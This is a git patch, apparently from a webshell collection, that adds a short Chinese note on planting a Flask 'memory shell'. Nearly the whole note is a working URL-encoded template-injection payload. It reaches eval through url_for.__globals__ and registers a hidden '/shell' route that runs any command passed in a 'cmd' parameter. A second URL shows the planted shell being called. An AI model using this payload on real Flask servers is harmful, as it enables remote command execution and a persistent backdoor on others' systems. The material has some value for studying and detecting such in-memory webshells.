From 8b5b371da44903fa31643d7b567fc6c2d9d58fef Mon Sep 17 00:00:00 2001
From: tennc <670357+tennc@users.noreply.github.com>
Date: Fri, 4 Jun 2021 19:54:16 +0800
Subject: [PATCH] =?UTF-8?q?add=20python=20flask=20=E5=86=85=E5=AD=98?=
 =?UTF-8?q?=E9=A9=AC=20@jweny?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

from : https://github.com/jweny/MemShellDemo/blob/master/MemShellForPython/python%20flask%20%E5%86%85%E5%AD%98%E9%A9%AC.md
---
 py/python flask 内存马.md | 18 ++++++++++++++++++
 1 file changed, 18 insertions(+)
 create mode 100644 py/python flask 内存马.md

diff --git a/py/python flask 内存马.md b/py/python flask 内存马.md
new file mode 100644
index 0000000..9a067d2
--- /dev/null
+++ b/py/python flask 内存马.md
@@ -0,0 +1,18 @@
+先起一个带有ssti的flask:
+
+插入路由:
+
+http://127.0.0.1:8000/test?param={{url_for.__globals__[%27__builtins__%27][%27eval%27](%22app.add_url_rule(%27/shell%27,%20%27shell%27,%20lambda%20:__import__(%27os%27).popen(_request_ctx_stack.top.request.args.get(%27cmd%27,%20%27whoami%27)).read())%22,{%27_request_ctx_stack%27:url_for.__globals__[%27_request_ctx_stack%27],%27app%27:url_for.__globals__[%27current_app%27]})}}
+
+
+访问植入的shell:
+http://127.0.0.1:8000/shell?cmd=whoami
+
+
+参考:
+
+https://github.com/iceyhexman/flask_memory_shell
+
+https://segmentfault.com/a/1190000022175553
+
+https://xz.aliyun.com/t/8029